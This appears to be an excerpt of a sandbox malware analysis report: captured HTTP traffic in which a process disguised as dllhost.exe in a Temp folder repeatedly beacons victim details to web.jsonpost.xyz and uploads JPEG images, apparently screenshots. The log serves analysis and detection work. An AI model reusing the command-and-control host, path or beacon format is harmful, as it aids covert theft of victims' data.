                                                                                Nov 29, 2024 01:52:09.559190989 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:09.559205055 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:09.679168940 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:09.679184914 CET2472OUTData Raw: 48 d2 29 c1 21 77 6d 0b 90 70 0a 93 8e f9 e6 b6 2e a3 8e 2d 6a f2 d6 de e6 d1 d5 75 28 ec 44 29 33 b3 40 d2 13 e5 ef 24 63 9c 1e 85 b1 d0 e0 f1 59 17 d0 de dd d8 cf 6f 25 95 93 dc 4c 81 1e f7 e7 59 1c 0e ec 03 6c 2d 8e 37 6d cf 7c e7 9a ae 6d b5
                                                                                Data Ascii: H)!wmp.-ju(D)3@$cYo%LYl-7m|m\]jj2ob|w,r:9qqqk=WsyfOknl%G7"($rFml1\\C#32Ac]ic8bmlen(`($I


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.44973872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:10.344719887 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.44973972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:10.590292931 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:10.590323925 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:10.590398073 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:10.590428114 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:10.710427999 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:10.710479975 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:10.710503101 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:10.710582018 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:10.710678101 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:10.710767031 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:10.710784912 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.44974072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:11.828202009 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.44974172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:12.217291117 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:12.217314959 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:12.217379093 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:12.217401028 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:12.337461948 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:12.337558985 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:12.337590933 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:12.337646961 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:12.337697029 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:12.337806940 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:12.457684040 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.44974372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:13.217861891 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.44974472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:13.702984095 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:13.703012943 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:13.703089952 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:13.703111887 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:13.823136091 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:13.823223114 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:13.823251963 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:13.823338032 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:13.823385954 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:13.823386908 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:13.823441029 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.44974672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:14.650605917 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.44974772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:15.180883884 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:15.180951118 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
